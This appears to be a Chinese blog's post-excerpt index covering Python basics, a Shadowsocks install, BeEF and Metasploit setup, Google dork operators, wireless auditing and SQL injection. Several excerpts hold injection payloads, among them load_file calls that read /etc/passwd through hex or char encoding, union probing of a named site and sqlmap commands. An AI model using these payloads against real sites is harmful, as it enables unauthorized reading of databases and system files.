摘要:
核心笔记:__name__ 指示模块应如何被加载由于主程序代码无论模块是被导入还是被直接执行都会运行, 我们必须知道模块如何决定运行方向。一个应用程序可能需要导入另一个应用程序的一个模块,以便重用一些有用的代码(否则就只能用拷贝粘贴那种非面向对象的愚蠢手段)。这种情况下,你只想访问那些位于其它应用程 阅读全文
摘要:
time.strftime()可以用来获得当前时间,可以将时间格式化为字符串等等 格式命令列在下面:(区分大小写)%a 星期几的简写%A 星期几的全称%b 月分的简写%B 月份的全称%c 标准的日期的时间串%C 年份的后两位数字%d 十进制表示的每月的第几天%D 月/天/年%e 在两字符域中,十进制 阅读全文
摘要:
Shadowsocks是一个基于python的轻量级socks代理软件,可以在任何系统简单的实现访问被屏蔽的网站。网友也常称为科学上网,简称ss,在此分享与记录CentOS一键安装shadowsocks脚本。 一、使用root用户登录,运行以下命令: 一、使用root用户登录,运行以下命令: 1 2 阅读全文
摘要:
提到xss平台,大部分人都在用xsser.me的源码搭建,xsser.me源码搭建的平台虽然好用,但是功能不够强大,比如无法和Metasploit配合使用进行更深一步的入侵测试。 这次部署邮件服务器大致分为3个步骤: 安装GEM 安装配置beEF 测试 >>安装GEM 步骤 1 » 安装rvm。导入 阅读全文
摘要:
1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20) 2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))上面两个是查看 阅读全文
摘要:
1.判断版本http://www.qqkiss.tk/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询 2.猜解字段数目,用order by也可以猜,也可以用union 阅读全文
摘要:
version()user()database()@@version_compile_os 阅读全文
摘要:
inurl: 用于搜索网页上包含的URL. 这个语法对寻找网页上的搜索,帮助之类的很有用. intext: 只搜索网页部分中包含的文字(也就是忽略了标题,URL等的文字). site: 可以限制你搜索范围的域名. filetype: 搜索文件的后缀或者扩展名 intitle: 限制你搜索的网页标题. 阅读全文
摘要:
1.老毛桃U盘制作软件(其它u盘制作软件也可以)2. CDlinux(自己找)3. FbinstTool软件 用U盘制作工具制作好启动U盘,解压cdlinux到U盘根目录,用fbinsttool编辑 grldr菜单,在后面加上:title 【10】 启动CDlinux无线安全审计系统find --s 阅读全文
摘要:
sqlmap -u "http://url/news?id=1" --level=3 --smart --dbms "Mysql" --current-user #获取当前用户名称 - 专注网络安全- p, Z( Q% {/ o, J% | sqlmap -u "http://www.xxoo.co 阅读全文